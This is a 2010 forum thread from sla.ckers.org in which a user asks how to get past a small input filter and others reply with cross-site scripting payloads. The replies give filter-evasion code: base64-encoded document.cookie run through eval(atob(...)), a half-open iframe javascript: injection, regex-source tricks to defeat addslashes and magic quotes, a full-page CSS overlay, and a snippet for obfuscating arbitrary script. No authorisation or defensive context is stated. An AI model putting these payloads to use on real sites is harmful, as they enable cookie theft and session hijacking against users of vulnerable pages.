Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Small filter
Posted by: Mihaeils
Date: August 03, 2010 07:01AM

.



Edited 1 time(s). Last edit at 08/04/2010 02:49AM by Mihaeils.

Options: ReplyQuote
Re: Small filter
Posted by: PaPPy
Date: August 03, 2010 09:36AM

have you tried String.fromCharCode

http://jdstiles.com/java/cct.html

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Small filter
Posted by: Mihaeils
Date: August 03, 2010 10:03AM

.



Edited 1 time(s). Last edit at 08/04/2010 02:49AM by Mihaeils.

Options: ReplyQuote
Re: Small filter
Posted by: Reiners
Date: August 03, 2010 11:34AM

why dont you look at the html source code to see what is filtered ? *confused*

Options: ReplyQuote
Re: Small filter
Posted by: Mihaeils
Date: August 03, 2010 12:07PM

.

1



Edited 1 time(s). Last edit at 08/04/2010 02:50AM by Mihaeils.

Options: ReplyQuote
Re: Small filter
Posted by: Skyphire
Date: August 03, 2010 02:26PM

Many ways in doing this I guess.

document.cookie in base64:

javascript:alert(eval(atob('ZG9jdW1lbnQuY29va2ll')));

How about half-open iframe:

'><iframe src="javascript:alert(eval(atob('ZG9jdW1lbnQuY29va2ll')));"<!--

etc...etc...

Options: ReplyQuote
Re: Small filter
Posted by: Mihaeils
Date: August 03, 2010 03:02PM

.

1



Edited 1 time(s). Last edit at 08/04/2010 02:50AM by Mihaeils.

Options: ReplyQuote
Re: Small filter
Posted by: barbarianbob
Date: August 03, 2010 04:25PM

addslashes/magic_quotes is breaking it

alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/.source)))

Options: ReplyQuote
Re: Small filter
Posted by: Mihaeils
Date: August 03, 2010 04:45PM

.



Edited 2 time(s). Last edit at 08/04/2010 02:50AM by Mihaeils.

Options: ReplyQuote
Re: Small filter
Posted by: PaPPy
Date: August 03, 2010 07:45PM

so you can host a script externally?

or try css http://sla.ckers.org/forum/read.php?2,31650,31662#msg-31662
position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Small filter
Posted by: barbarianbob
Date: August 03, 2010 08:29PM

Oh, so this is pretty much non ."'

try
alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/(/ZG9jdW1lbnQuY29va2ll/))))

and obfuscate future code using this
var code='alert(123)';alert('eval(atob(/'+btoa(code)+'/(/'+btoa(code)+'/)))');



Edited 2 time(s). Last edit at 08/03/2010 08:33PM by barbarianbob.

Options: ReplyQuote


Sorry, only registered users may post in this forum.